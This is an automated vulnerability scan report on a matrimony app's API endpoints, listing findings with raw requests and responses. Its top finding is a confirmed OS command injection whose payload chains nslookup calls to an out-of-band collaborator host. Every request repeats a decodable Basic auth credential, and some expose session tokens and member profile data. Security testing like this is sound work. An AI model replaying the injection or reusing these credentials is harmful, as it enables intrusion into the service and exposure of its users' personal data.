BM Scan Report
Summary
The table below shows the numbers of issues identified in different categories. Issues are classified according to severity as
High, Medium, Low or Information. This reflects the likely impact of each issue for a typical organization. Issues are also
classified according to confidence as Certain, Firm or Tentative. This reflects the inherent reliability of the technique that
was used to identify the issue.
                 Confidence
Severity         Certain  Firm  Tentative  Total
High             1        0     0          1
Medium           0        6     5          11
Low              1        0     0          1
Information      43       0     0          43
The chart below shows the aggregated numbers of issues identified in each category. Solid coloured bars represent
issues with a confidence level of Certain, and the bars fade as the confidence level falls.
Contents
1. OS command injection
2. Cross-site request forgery
2.1. https://apps.bharatmatrimony.com/appdynamicarray/appgetarrayversion.php
2.2. https://apps.bharatmatrimony.com/applogin/appgetcountryip.php
2.3. https://apps.bharatmatrimony.com/applogin/loginwithdet.php
2.4. https://apps.bharatmatrimony.com/applogin/logout.php
2.5. https://apps.bharatmatrimony.com/appsearch/appcurltrack.php
3. Session token in URL
3.1. https://apps.bharatmatrimony.com/appei/appspromos.php
3.2. https://apps.bharatmatrimony.com/appei/appspromos.php
3.3. https://apps.bharatmatrimony.com/appei/appspromos.php
3.4. https://apps.bharatmatrimony.com/appei/appspromos.php
3.5. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php
3.6. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php
4. Strict transport security not enforced
5. Input returned in response (reflected)
5.1. https://apps.bharatmatrimony.com/apicommhistory/communicationhistory.php [URL path filename]
5.2. https://apps.bharatmatrimony.com/apicommhistory/communicationhistory.php [name of an arbitrarily supplied URL parameter]
5.3. https://apps.bharatmatrimony.com/appassuredcontact/getphoneprivacy.php [URL path filename]
5.4. https://apps.bharatmatrimony.com/appassuredcontact/getphoneprivacy.php [name of an arbitrarily supplied URL parameter]
5.5. https://apps.bharatmatrimony.com/appdaily6/yettobeviewed.php [URL path filename]
5.6. https://apps.bharatmatrimony.com/appdaily6/yettobeviewed.php [name of an arbitrarily supplied URL parameter]
5.7. https://apps.bharatmatrimony.com/appdynamicarray/appdynamicpopulate.php [URL path filename]
5.8. https://apps.bharatmatrimony.com/appdynamicarray/appdynamicpopulate.php [name of an arbitrarily supplied URL parameter]
5.9. https://apps.bharatmatrimony.com/appdynamicarray/appgetarrayversion.php [URL path filename]
5.10. https://apps.bharatmatrimony.com/appdynamicarray/appgetarrayversion.php [name of an arbitrarily supplied URL parameter]
5.11. https://apps.bharatmatrimony.com/appeditprofile/appeditprofile.php [URL path filename]
5.12. https://apps.bharatmatrimony.com/appeditprofile/appeditprofile.php [name of an arbitrarily supplied URL parameter]
5.13. https://apps.bharatmatrimony.com/appeditprofile/appownprofile.php [URL path filename]
5.14. https://apps.bharatmatrimony.com/appeditprofile/appownprofile.php [name of an arbitrarily supplied URL parameter]
5.15. https://apps.bharatmatrimony.com/appei/appspromos.php [URL path filename]
5.16. https://apps.bharatmatrimony.com/appei/appspromos.php [name of an arbitrarily supplied URL parameter]
5.17. https://apps.bharatmatrimony.com/applogin/appgetcountryip.php [URL path filename]
5.18. https://apps.bharatmatrimony.com/applogin/appgetcountryip.php [name of an arbitrarily supplied URL parameter]
5.19. https://apps.bharatmatrimony.com/applogin/getDeviceInfo.php [URL path filename]
5.20. https://apps.bharatmatrimony.com/applogin/getDeviceInfo.php [name of an arbitrarily supplied URL parameter]
5.21. https://apps.bharatmatrimony.com/applogin/loginwithdet.php [URL path filename]
5.22. https://apps.bharatmatrimony.com/applogin/loginwithdet.php [name of an arbitrarily supplied URL parameter]
5.23. https://apps.bharatmatrimony.com/applogin/logout.php [URL path filename]
5.24. https://apps.bharatmatrimony.com/applogin/logout.php [name of an arbitrarily supplied URL parameter]
5.25. https://apps.bharatmatrimony.com/appmemberhome/memstats.php [URL path filename]
5.26. https://apps.bharatmatrimony.com/appmemberhome/memstats.php [name of an arbitrarily supplied URL parameter]
5.27. https://apps.bharatmatrimony.com/appphoto/enlargephoto.php [URL path filename]
5.28. https://apps.bharatmatrimony.com/appphoto/enlargephoto.php [name of an arbitrarily supplied URL parameter]
5.29. https://apps.bharatmatrimony.com/appphoto/enlargephotodisplay.php [URL path filename]
5.30. https://apps.bharatmatrimony.com/appphoto/enlargephotodisplay.php [name of an arbitrarily supplied URL parameter]
5.31. https://apps.bharatmatrimony.com/appsearch/appcurltrack.php [URL path filename]
5.32. https://apps.bharatmatrimony.com/appsearch/appcurltrack.php [name of an arbitrarily supplied URL parameter]
5.33. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php [URL path filename]
5.34. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php [name of an arbitrarily supplied URL parameter]
5.35. https://apps.bharatmatrimony.com/appsuccess/successstory.php [URL path filename]
5.36. https://apps.bharatmatrimony.com/appsuccess/successstory.php [name of an arbitrarily supplied URL parameter]
5.37. https://apps.bharatmatrimony.com/appunified/appinboxui.php [URL path filename]
5.38. https://apps.bharatmatrimony.com/appunified/appinboxui.php [name of an arbitrarily supplied URL parameter]
5.39. https://apps.bharatmatrimony.com/appunified/viewcalldetails.php [URL path filename]
5.40. https://apps.bharatmatrimony.com/appunified/viewcalldetails.php [name of an arbitrarily supplied URL parameter]
6. Email addresses disclosed
6.1. https://apps.bharatmatrimony.com/applogin/loginwithdet.php
6.2. https://apps.bharatmatrimony.com/appmemberhome/memstats.php
7. SSL certificate
1. OS command injection
Summary
Severity: High
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/loginwithdet.php
Issue detail
The APPTYPE parameter appears to be vulnerable to OS command injection attacks. It is possible to use various shell
metacharacters to inject arbitrary OS commands. The command output does not appear to be returned in the application's
responses. However, it is possible to cause the application to interact with an external domain, to verify that a command was
executed.
Issue background
Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a
command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use
shell metacharacters to modify the command that is executed, and inject arbitrary further commands that will be executed
by the server.
OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the
application, or of the application's own data and functionality. It may also be possible to use the server as a platform for
attacks against other systems. The exact potential for exploitation depends upon the security context in which the
command is executed, and the privileges that this context has regarding sensitive resources on the server.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost
every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to
perform additional commands than the one intended.
If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers
of defense should be used to prevent attacks:
· The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used.
Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any
conceivable shell metacharacter or whitespace, should be rejected.
· The application should use command APIs that launch a specific process via its name and command-line
parameters, rather than passing a command string to a shell interpreter that supports command chaining and
redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell
metacharacters. This defense can mitigate the impact of an attack even in the event that an attacker
circumvents the input validation defenses.
Vulnerability classifications
· CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
· CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
· CWE-116: Improper Encoding or Escaping of Output
Request
POST /applogin/loginwithdet.php HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 611
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101%26nslookup%20-q%3dcname%207ckkyriz6bb2uav470vckw622t8uwpkh77vw.burpcollaborator.net.%26'%5c
%22%600%26nslookup%20-q%3dcname%207ckkyriz6bb2uav470vckw622t8uwpkh77vw.burpcollaborator.net.
%26%60'&APPVERSION=4.6&APPVERSIONCODE=192&CN=IN&DEVICEDET=%7B%22DEVICE%22%3A%22iPhone%206S%22%2C
%22SERIAL%22%3A%22%22%2C%22LINE_NUMBER%22%3A%22%22%2C%22SIM_OP_NAME%22%3A%22AirTel%22%2C
%22ISO_COUNTRY_CODE%22%
...[SNIP]...
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 6235
Content-Type: application/json
Date: Tue, 19 May 2020 17:26:20 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRCODE":"0","TOTALIDS":"1","SYSTEMDATE":"2020-05-19 22:56:19","MEMBERSTATSPHOTO":
{"PHOTOAVAILABLE":"Y","PHOTOPROTECTED":"N"},"PROFILEIDS":{"PROFILEID":[{"MATRIID":"M6651646","S
...[SNIP]...
The lookup was received from IP address 115.112.200.200 at 2020-May-19 17:26:19 UTC.
2. Cross-site request forgery
· /appdynamicarray/appgetarrayversion.php
· /applogin/appgetcountryip.php
· /applogin/loginwithdet.php
· /applogin/logout.php
· /appsearch/appcurltrack.php
Issue background
Cross-site request forgery (CSRF) vulnerabilities may arise when applications rely solely on HTTP cookies to identify the user
that has issued a particular request. Because browsers automatically add cookies to requests regardless of their origin, it
may be possible for an attacker to create a malicious web site that forges a cross-domain request to the vulnerable
application. For a request to be vulnerable to CSRF, the following conditions must hold:
· The request can be issued cross-domain, for example using an HTML form. If the request contains non-
standard headers or body content, then it may only be issuable from a page that originated on the same
domain.
· The application relies solely on HTTP cookies or Basic Authentication to identify the user that issued the
request. If the application places session-related tokens elsewhere within the request, then it may not be
vulnerable.
· The request performs some privileged action within the application, which modifies the application's state
based on the identity of the issuing user.
· The attacker can determine all the parameters required to construct a request that performs the action. If the
request contains any values that the attacker cannot determine or predict, then it is not vulnerable.
Issue remediation
The most effective way to protect against CSRF vulnerabilities is to include within relevant requests an additional token
that is not transmitted in a cookie: for example, a parameter in a hidden form field. This additional token should contain
sufficient entropy, and be generated using a cryptographic random number generator, such that it is not feasible for an
attacker to determine or predict the value of any token that was issued to another user. The token should be associated
with the user's session, and the application should validate that the correct token is received before performing any action
resulting from the request.
An alternative approach, which may be easier to implement, is to validate that Host and Referrer headers in relevant
requests are both present and contain the same domain name. However, this approach is somewhat less robust:
historically, quirks in browsers and plugins have often enabled attackers to forge cross-domain requests that manipulate
these headers to bypass such defences.
References
· Using Burp to Test for Cross-Site Request Forgery
· The Deputies Are Still Confused
Vulnerability classifications
· CWE-352: Cross-Site Request Forgery (CSRF)
2.1. https://apps.bharatmatrimony.com/appdynamicarray/appgetarrayversion.php
Summary
Severity: Medium
Confidence: Tentative
Host: https://apps.bharatmatrimony.com
Path: /appdynamicarray/appgetarrayversion.php
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against authenticated users.
The original request contains parameters that look like they may be anti-CSRF tokens. However the request is
successful if these parameters are removed.
Request
POST /appdynamicarray/appgetarrayversion.php HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 102
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=5fbe33bcdfa07a4ad90bd52308ace7fb1&ID=&OUTPUTTYPE=2
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 150
Content-Type: application/json
Date: Tue, 19 May 2020 15:46:17 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRCODE":"0","VERSIONDET":
{"RELIGIONLIST":"1","MOTHERTONGUELIST":"1","CASTELIST":"1","ALTERNATECASTELIST":"1","COUNTRYLIST":"1"}}
2.2. https://apps.bharatmatrimony.com/applogin/appgetcountryip.php
Summary
Severity: Medium
Confidence: Tentative
Host: https://apps.bharatmatrimony.com
Path: /applogin/appgetcountryip.php
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against authenticated users.
Request
POST /applogin/appgetcountryip.php HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 72
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2&SDBMATRID=104
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 55
Content-Type: application/json
Date: Tue, 19 May 2020 15:46:17 GMT
Connection: close
{"RESPONSECODE":"1","ERRCODE":"0","IPCOUNTRYCODE":"IN"}
2.3. https://apps.bharatmatrimony.com/applogin/loginwithdet.php
Summary
Severity: Medium
Confidence: Tentative
Host: https://apps.bharatmatrimony.com
Path: /applogin/loginwithdet.php
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against authenticated users.
The original request contains parameters that look like they may be anti-CSRF tokens. However the request is
successful if these parameters are removed.
Request
POST /applogin/loginwithdet.php HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 611
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CN=IN&DEVICEDET=%7B%22DEVICE%22%3A%22iPhone%206S%22%2C
%22SERIAL%22%3A%22%22%2C%22LINE_NUMBER%22%3A%22%22%2C%22SIM_OP_NAME%22%3A%22AirTel%22%2C
%22ISO_COUNT
...[SNIP]...
22%2C%22OP_NAME%22%3A%22%22%2C%22MANUFACTURER%22%3A%22Apple
%22%7D&FRMLOGIN=1&ID=KSWDmXnCsyLfYL2smrF49Q%3D
%3D&NOTIFIYDET=1~1~1~1~1~1~1&OUTPUTTYPE=2&PASSWORD=7N8eX6EhU48C5dU7s1TIIA%3D
%3D&REFINESEARCH=1&REGISTERID=34732bb190ef99c64953069b41ef8ba025236e27b164b3b17454fe26618a2ce5&SEARCHRANDO
MPROMO=1&ltype=1
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 6278
Content-Type: application/json
Date: Tue, 19 May 2020 15:46:21 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRCODE":"0","TOTALIDS":"1","SYSTEMDATE":"2020-05-19 21:16:20","MEMBERSTATSPHOTO":
{"PHOTOAVAILABLE":"Y","PHOTOPROTECTED":"N"},"PROFILEIDS":{"PROFILEID":[{"MATRIID":"M6651646","S
...[SNIP]...
2.4. https://apps.bharatmatrimony.com/applogin/logout.php
Summary
Severity: Medium
Confidence: Tentative
Host: https://apps.bharatmatrimony.com
Path: /applogin/logout.php
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against authenticated users.
The original request contains parameters that look like they may be anti-CSRF tokens. However, the request is
successful if these parameters are removed.
Request
POST /applogin/logout.php HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 159
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=c172431a4936377805ed7b9fdee61cd53&ID=M6651646&OUTPUT
TYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 36
Content-Type: application/json
Date: Tue, 19 May 2020 15:46:20 GMT
Connection: close
{"RESPONSECODE":"1","ERRCODE":"0"}
2.5. https://apps.bharatmatrimony.com/appsearch/appcurltrack.php
Summary
Severity: Medium
Confidence: Tentative
Host: https://apps.bharatmatrimony.com
Path: /appsearch/appcurltrack.php
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against authenticated
users.
Request
POST /appsearch/appcurltrack.php HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 51
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=&regdata=
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Date: Tue, 19 May 2020 16:15:04 GMT
Connection: close
3. Session token in URL
· /appei/appspromos.php
· /appei/appspromos.php
· /appei/appspromos.php
· /appei/appspromos.php
· /appsearch/appwhoviewedprofile.php
· /appsearch/appwhoviewedprofile.php
Issue background
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any
forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or
emailed around by users. They may be disclosed to third parties via the Referrer header when any off-site links are
followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
Applications should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in
forms that are submitted using the POST method.
Vulnerability classifications
· CWE-200: Information Exposure
· CWE-384: Session Fixation
· CWE-598: Information Exposure Through Query Strings in GET Request
3.1. https://apps.bharatmatrimony.com/appei/appspromos.php
Summary
Severity: Medium
Confidence: Firm
Host: https://apps.bharatmatrimony.com
Path: /appei/appspromos.php
Issue detail
The URL in the request appears to contain a session token within the query string:
· https://apps.bharatmatrimony.com/appei/appspromos.php?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=63e52ffb4625ec622ad67f56
b79d7f2e5&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192
Request
GET /appei/appspromos.php?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=63e52ffb4625ec622ad67f56b79d7f2e5&
TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192 HTTP/1.1
Host: apps.bharatmatrimony.com
Connection: close
Accept: */*
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 1418
Content-Type: application/json
Date: Tue, 19 May 2020 12:24:11 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRORCODE":"0","ALLCOMMCNT":"4","TOTALREC":"1","RECORDLIST":[{"PROFILE":
{"PROFILESTATUS":"0","PHONEVERIFIED":"Y","AGE":"24","HEIGHT":"5 Ft 11 In \/ 180 Cms","EDUCATION":"","OCCU
...[SNIP]...
3.2. https://apps.bharatmatrimony.com/appei/appspromos.php
Summary
Severity: Medium
Confidence: Firm
Host: https://apps.bharatmatrimony.com
Path: /appei/appspromos.php
Issue detail
The URL in the request appears to contain a session token within the query string:
· https://apps.bharatmatrimony.com/appei/appspromos.php?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=0a66cd1c6ed8276b5bf4eef4
413bc96e1&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192
Request
GET /appei/appspromos.php?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=0a66cd1c6ed8276b5bf4eef4413bc96e1&
TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192 HTTP/1.1
Host: apps.bharatmatrimony.com
Connection: close
Accept: */*
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 1418
Content-Type: application/json
Date: Tue, 19 May 2020 12:35:59 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRORCODE":"0","ALLCOMMCNT":"4","TOTALREC":"1","RECORDLIST":[{"PROFILE":
{"PROFILESTATUS":"0","PHONEVERIFIED":"Y","AGE":"24","HEIGHT":"5 Ft 11 In \/ 180 Cms","EDUCATION":"","OCCU
...[SNIP]...
3.3. https://apps.bharatmatrimony.com/appei/appspromos.php
Summary
Severity: Medium
Confidence: Firm
Host: https://apps.bharatmatrimony.com
Path: /appei/appspromos.php
Issue detail
The URL in the request appears to contain a session token within the query string:
· https://apps.bharatmatrimony.com/appei/appspromos.php?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=04f8dc1093dd3ec4f2e4c1bd
9393cdaa4&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192
Request
GET /appei/appspromos.php?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&
TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192 HTTP/1.1
Host: apps.bharatmatrimony.com
Connection: close
Accept: */*
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 1418
Content-Type: application/json
Date: Tue, 19 May 2020 15:37:01 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRORCODE":"0","ALLCOMMCNT":"4","TOTALREC":"1","RECORDLIST":[{"PROFILE":
{"PROFILESTATUS":"0","PHONEVERIFIED":"Y","AGE":"24","HEIGHT":"5 Ft 11 In \/ 180 Cms","EDUCATION":"","OCCU
...[SNIP]...
3.4. https://apps.bharatmatrimony.com/appei/appspromos.php
Summary
Severity: Medium
Confidence: Firm
Host: https://apps.bharatmatrimony.com
Path: /appei/appspromos.php
Issue detail
The URL in the request appears to contain a session token within the query string:
· https://apps.bharatmatrimony.com/appei/appspromos.php?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=1e3edd6071d0eb091e7a257
11511fe2a7&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192
Request
GET /appei/appspromos.php?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=1e3edd6071d0eb091e7a25711511fe2a7
&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192 HTTP/1.1
Host: apps.bharatmatrimony.com
Connection: close
Accept: */*
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 1418
Content-Type: application/json
Date: Tue, 19 May 2020 15:41:28 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRORCODE":"0","ALLCOMMCNT":"4","TOTALREC":"1","RECORDLIST":[{"PROFILE":
{"PROFILESTATUS":"0","PHONEVERIFIED":"Y","AGE":"24","HEIGHT":"5 Ft 11 In \/ 180 Cms","EDUCATION":"","OCCU
...[SNIP]...
3.5. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php
Summary
Severity: Medium
Confidence: Firm
Host: https://apps.bharatmatrimony.com
Path: /appsearch/appwhoviewedprofile.php
Issue detail
The URL in the request appears to contain a session token within the query string:
· https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php?
SDBMATRIID=M6651646&OUTPUTTYPE=2&APPTYPE=101&APPVERSION=4.6&PIINFO=27~165.10000610352~98~47~3~0
~3~1017~0~0~2~1~2~98~31~0~0~3116~3~2404~3~3~9~1~3~4~1~M~F~1589895554~~~~~~~~1~0~3~1~0~0~3~N~0~1~0
~1~1~3~472~79~https://m-
imgs.matrimonycdn.com/photos/2019/09/30/15/M6651646_IMXiF_4692_TL.jpg~1,12,16,26,23,21&LOGINGEN=M&DEVI
CEDET=&USERTIMEDET=1589902649&DOS=27&Lang=en&LOGINTYPE=F&MID=M6651646&ENCID=82518c062044e155fc
e5b3980c0e28c60&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192&GENDER=M&ST
LIMIT=0&RECCNT=20
Request
GET /appsearch/appwhoviewedprofile.php?
SDBMATRIID=M6651646&OUTPUTTYPE=2&APPTYPE=101&APPVERSION=4.6&PIINFO=27~165.10000610352~98~47~3~0~3~1017~0~
0~2~1~2~98~31~0~0~3116~3~2404~3~3~9~1~3~4~1~M~F~1589895554~~~~~~~~1~0~3~1~0~0~3~N~0~1~0~1~1~3~472~79~https://
m-
imgs.matrimonycdn.com/photos/2019/09/30/15/M6651646_IMXiF_4692_TL.jpg~1,12,16,26,23,21&LOGINGEN=M&DEVICEDET=&US
ERTIMEDET=1589902649&DOS=27&Lang=en&LOGINTYPE=F&MID=M6651646&ENCID=82518c062044e155fce5b3980c0e28c60&TOK
ENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192&GENDER=M&STLIMIT=0&RECCNT=20 HTTP/1.1
Host: apps.bharatmatrimony.com
Connection: close
Accept: */*
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 11969
Content-Type: application/json
Date: Tue, 19 May 2020 15:37:32 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRCODE":"0","TOTALRESULTS":"42","MATCHINGCOUNT":"8","REMAININGDAYS":"100","SEARCHRES":
{"PROFILE":[{"PROFILESTATUS":"0","MATRIID":"M6257665","NAME":"Vasutha","AGE":"24","GENDER"
...[SNIP]...
3.6. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php
Summary
Severity: Medium
Confidence: Firm
Host: https://apps.bharatmatrimony.com
Path: /appsearch/appwhoviewedprofile.php
Issue detail
The URL in the request appears to contain a session token within the query string:
· https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php?
SDBMATRIID=M6651646&OUTPUTTYPE=2&APPTYPE=101&APPVERSION=4.6&PIINFO=27~165.10000610352~98~47~3~0
~3~1017~0~0~2~1~2~98~31~0~0~3116~3~2404~3~3~9~1~3~4~1~M~F~1589895554~~~~~~~~1~0~3~1~0~0~3~N~0~1~0
~1~1~3~472~79~https://m-
imgs.matrimonycdn.com/photos/2019/09/30/15/M6651646_IMXiF_4692_TL.jpg~1,12,16,26,23,21&LOGINGEN=M&DEVI
CEDET=&USERTIMEDET=1589902771&DOS=27&Lang=en&LOGINTYPE=F&MID=M6651646&ENCID=02ff975d1149526a01
c1cfcf7f39321a8&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192&SDBMATRID=M6
651646&STLIMIT=0&RECCNT=20&GENDER=M&INAPPIDS=M6257665,E5321603&CONTACTED=0&VIEWED=0&LOGINGEN
=M&FROMINAPP=1&USERTIMEDET=1589902771&SHORTLISTED=0&LOGINTYPE=F&STLIMIT=0&RECCNT=20
Request
GET /appsearch/appwhoviewedprofile.php?
SDBMATRIID=M6651646&OUTPUTTYPE=2&APPTYPE=101&APPVERSION=4.6&PIINFO=27~165.10000610352~98~47~3~0~3~1017~0~
